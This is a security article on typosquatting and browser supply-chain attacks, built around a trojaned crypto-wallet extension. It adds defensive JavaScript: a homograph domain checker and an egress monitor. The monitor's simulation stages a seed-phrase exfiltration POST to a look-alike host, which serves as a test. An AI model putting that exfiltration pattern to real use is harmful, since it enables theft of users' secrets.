
Typosquatting Is Not a User Problem—It’s a Supply Chain Threat

The point: Typosquatting is no longer a user problem but a supply chain threat. AI-generated lookalike domains hide inside third-party scripts, and standard security stacks do not detect them. The Trust Wallet attack shows what that means: 8.5 million dollars gone within 48 hours, without warning.

AI-generated lookalike domains are now embedded in third-party scripts running on websites. The Trust Wallet attack, with 8.5 million dollars in damages, shows why classical security stacks fail to detect them and which measures are actually needed.

Typosquatting has fundamentally changed. It is no longer about typographical errors in URLs but about manipulated third-party scripts executed inside legitimate applications. Large language models generate thousands of convincing domain variants in minutes, and homograph attacks that mix Latin, Cyrillic and Greek characters blur the line between a real and a fake domain. A browser shows such a mixed-script name in its punycode (xn--) form when it appears in the address bar, but the user never sees the host a third-party script loads from or sends data to, so that display policy protects no one here.
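To make the homograph point concrete, here is an added example (not code from the article): a checker that takes a hostname found in a script src or an outbound request and decides whether it is the allowlisted host, a mixed-script or confusable look-alike of it, a plain typo variant, or unrelated. The allowlist, the `.example` hosts and the confusable table are constructed for the example; the table is a hand-picked subset of Unicode's confusables list, not the full one.

```javascript
// Added example (not from the article): classify a hostname seen in a
// script src or request as trusted, look-alike, typo variant or unknown.
// The allowlist and the confusable table below are constructed for this
// example; the table is a hand-picked subset of Unicode's confusables.

// Cyrillic and Greek letters that render like Latin ones (subset).
const CONFUSABLES = new Map([
  ["\u0430", "a"], ["\u0435", "e"], ["\u043e", "o"], ["\u0440", "p"],
  ["\u0441", "c"], ["\u0445", "x"], ["\u0443", "y"], ["\u0456", "i"],
  ["\u0458", "j"], ["\u0455", "s"], ["\u03bf", "o"], ["\u03b1", "a"],
  ["\u03bd", "v"], ["\u03c1", "p"],
]);

const SCRIPTS = {
  Latin: /\p{Script=Latin}/u,
  Cyrillic: /\p{Script=Cyrillic}/u,
  Greek: /\p{Script=Greek}/u,
};

// Names of the scripts used in one DNS label; digits and "-" count as none.
function scriptsIn(label) {
  return Object.keys(SCRIPTS).filter((name) => SCRIPTS[name].test(label));
}

// Map confusables to their Latin look-alikes, so that "w\u0430llet"
// (Cyrillic a) and "wallet" collapse to the same skeleton.
function skeleton(host) {
  return Array.from(host.normalize("NFKC").toLowerCase())
    .map((ch) => CONFUSABLES.get(ch) ?? ch)
    .join("");
}

// Levenshtein distance, for plain typo variants such as "walet.example".
function editDistance(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const subst = prev[j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1);
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, subst);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Punycode form of the host, as it appears in DNS, TLS certificates and
// most logs; null if the URL parser rejects the name.
function punycode(host) {
  try {
    return new URL(`https://${host}/`).hostname;
  } catch {
    return null;
  }
}

function classifyDomain(candidate, allowlist) {
  const host = candidate.trim().toLowerCase();
  const ascii = punycode(host);
  if (allowlist.includes(host)) {
    return { verdict: "trusted", host, ascii, reason: "exact allowlist match" };
  }
  // Latin letters mixed with Cyrillic or Greek ones in a single label.
  const mixed = host.split(".").find((label) => scriptsIn(label).length > 1);
  if (mixed) {
    return { verdict: "lookalike", host, ascii,
             reason: `label "${mixed}" mixes scripts ${scriptsIn(mixed).join("+")}` };
  }
  // A label written entirely in another script that still reads as a trusted name.
  const skel = skeleton(host);
  const twin = allowlist.find((trusted) => skeleton(trusted) === skel);
  if (twin) {
    return { verdict: "lookalike", host, ascii, reason: `confusable twin of ${twin}` };
  }
  const near = allowlist.find((trusted) => editDistance(host, trusted) <= 2);
  if (near) {
    return { verdict: "typo", host, ascii, reason: `within 2 edits of ${near}` };
  }
  return { verdict: "unknown", host, ascii, reason: "no relation to allowlist" };
}

// Constructed allowlist of hosts this page is supposed to talk to.
const ALLOWLIST = ["wallet.example", "apex.example"];

for (const h of ["wallet.example", "w\u0430llet.example",
                 "\u0430\u0440\u0435\u0445.example", "walet.example", "cdn.example"]) {
  const r = classifyDomain(h, ALLOWLIST);
  console.log(`${r.verdict.padEnd(9)} ${r.host} (${r.ascii}) ${r.reason}`);
}
```

The check is per exact host; subdomains of an allowlisted host and names registered under a different public suffix are deliberately left to the caller, and the edit-distance threshold of 2 is a tuning knob, not a standard.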

The Trust Wallet case shows what this looks like in practice: a worm named Shai-Hulud harvested developer credentials over months. With stolen GitHub tokens and npm publishing keys, a trojaned version of the Trust Wallet extension was distributed through official channels; it even passed Chrome's verification. The malware silently extracted seed phrases and sent them to an attacker-controlled server disguised as an analytics endpoint. Within 48 hours, 2,500 wallets were emptied. Total damage: 8.5 million dollars.

The core problem: Firewalls, WAFs and EDR never see what happens inside the browser, and a Content Security Policy only decides which origins may serve scripts and, via connect-src, which hosts may receive requests. None of these controls observes what an allowlisted script actually does once it is running, and a trojaned release of a trusted script stays inside the allowlist. Typical e-commerce sites load 40–60 third-party scripts, each a potential attack vector.

Whether the target is payment card data or cryptocurrency seed phrases makes no difference. The attack methodology is identical: a trusted program loaded by the browser is modified to intercept sensitive data, completely invisible to the victim's server logs and to the classical security stack. Subresource Integrity catches a third-party script whose bytes changed under a pinned hash, but not a malicious release that arrives through the official publishing channel as the new legitimate version. These controls are not misconfigured; they were simply not designed for browser observability.
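The observability that the core-problem paragraph and this one say is missing comes down to one question: which hosts do the scripts in a page talk to at runtime? As an added example (not code from the article or from Trust Wallet), here is a minimal in-page egress monitor in JavaScript that wraps `fetch`, `XMLHttpRequest.prototype.open` and `navigator.sendBeacon`, resolves every destination the way the browser would, and records it against an allowlist. `scope` stands in for `window`, and `simulate()` drives it with a constructed browser stand-in so the example runs without a browser or network; all host names are invented.

```javascript
// Added example (not from the article): an in-page egress monitor that
// wraps the browser APIs a script can use to send data out (fetch,
// XMLHttpRequest.prototype.open, navigator.sendBeacon) and records the
// destination host of every call against an allowlist. `scope` stands in
// for `window`; simulate() below builds a constructed stand-in so the
// example runs without a browser or network.

function installEgressMonitor(scope, { allowedHosts, mode = "report", onEvent }) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const base = scope.location ? scope.location.href : "https://app.example/";
  const events = [];

  // Resolve the target the way the browser would, record it, and say
  // whether the call may proceed. In a real page the captured stack names
  // the script that made the call, which is the attribution you want.
  function inspect(api, target) {
    let host;
    try {
      host = new URL(String(target), base).hostname; // look-alikes show up as xn--
    } catch {
      host = String(target);
    }
    const event = { api, host, allowed: allowed.has(host), initiator: new Error().stack };
    events.push(event);
    if (onEvent) onEvent(event);
    return event.allowed || mode !== "block";
  }

  if (typeof scope.fetch === "function") {
    const origFetch = scope.fetch;
    scope.fetch = function (input, init) {
      const target = input && typeof input === "object" && "url" in input ? input.url : input;
      if (!inspect("fetch", target)) {
        return Promise.reject(new TypeError(`egress blocked: ${target}`));
      }
      return origFetch.call(this, input, init);
    };
  }

  const xhr = scope.XMLHttpRequest;
  if (xhr && typeof xhr.prototype.open === "function") {
    const origOpen = xhr.prototype.open;
    xhr.prototype.open = function (method, url, ...rest) {
      if (!inspect("xhr", url)) throw new Error(`egress blocked: ${url}`);
      return origOpen.call(this, method, url, ...rest);
    };
  }

  if (scope.navigator && typeof scope.navigator.sendBeacon === "function") {
    const origBeacon = scope.navigator.sendBeacon;
    scope.navigator.sendBeacon = function (url, data) {
      if (!inspect("sendBeacon", url)) return false;
      return origBeacon.call(this, url, data);
    };
  }

  return events;
}

// Constructed browser stand-in: each transport just records what would
// have gone on the wire. Returns the monitor's events and the wire log.
function simulate(mode) {
  const wire = [];
  const scope = {
    location: { href: "https://shop.example/checkout" },
    fetch: (input) => { wire.push(String(input)); return Promise.resolve({ ok: true }); },
    navigator: { sendBeacon: (url) => { wire.push(String(url)); return true; } },
    XMLHttpRequest: class { open(method, url) { wire.push(url); } },
  };
  const events = installEgressMonitor(scope, {
    allowedHosts: ["shop.example", "analytics.example"], mode,
  });

  // Two legitimate calls, then what a trojaned script does: a POST to a
  // look-alike of the analytics host (Cyrillic "\u0430") and an XHR to a
  // host the page has no business with.
  scope.fetch("/api/cart").catch(() => {});
  scope.navigator.sendBeacon("https://analytics.example/collect", "pageview");
  scope.fetch("https://an\u0430lytics.example/collect", { method: "POST", body: "seedphrase=redacted" })
    .catch(() => {});
  try {
    new scope.XMLHttpRequest().open("POST", "https://collect.example/v1");
  } catch {
    // thrown only in "block" mode
  }

  return {
    wire,
    events: events.map(({ api, host, allowed }) => ({ api, host, allowed })),
  };
}

console.log(JSON.stringify(simulate("report").events, null, 2));
```

Treat this as telemetry, not enforcement: a script that runs before the monitor can keep references to the original functions, and `<img>` beacons, WebSocket and form posts are not wrapped here. The enforcing layer is the same allowlist expressed in CSP (`connect-src`, `img-src`); the monitor's value is that it shows which script started talking to a host the policy never expected.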
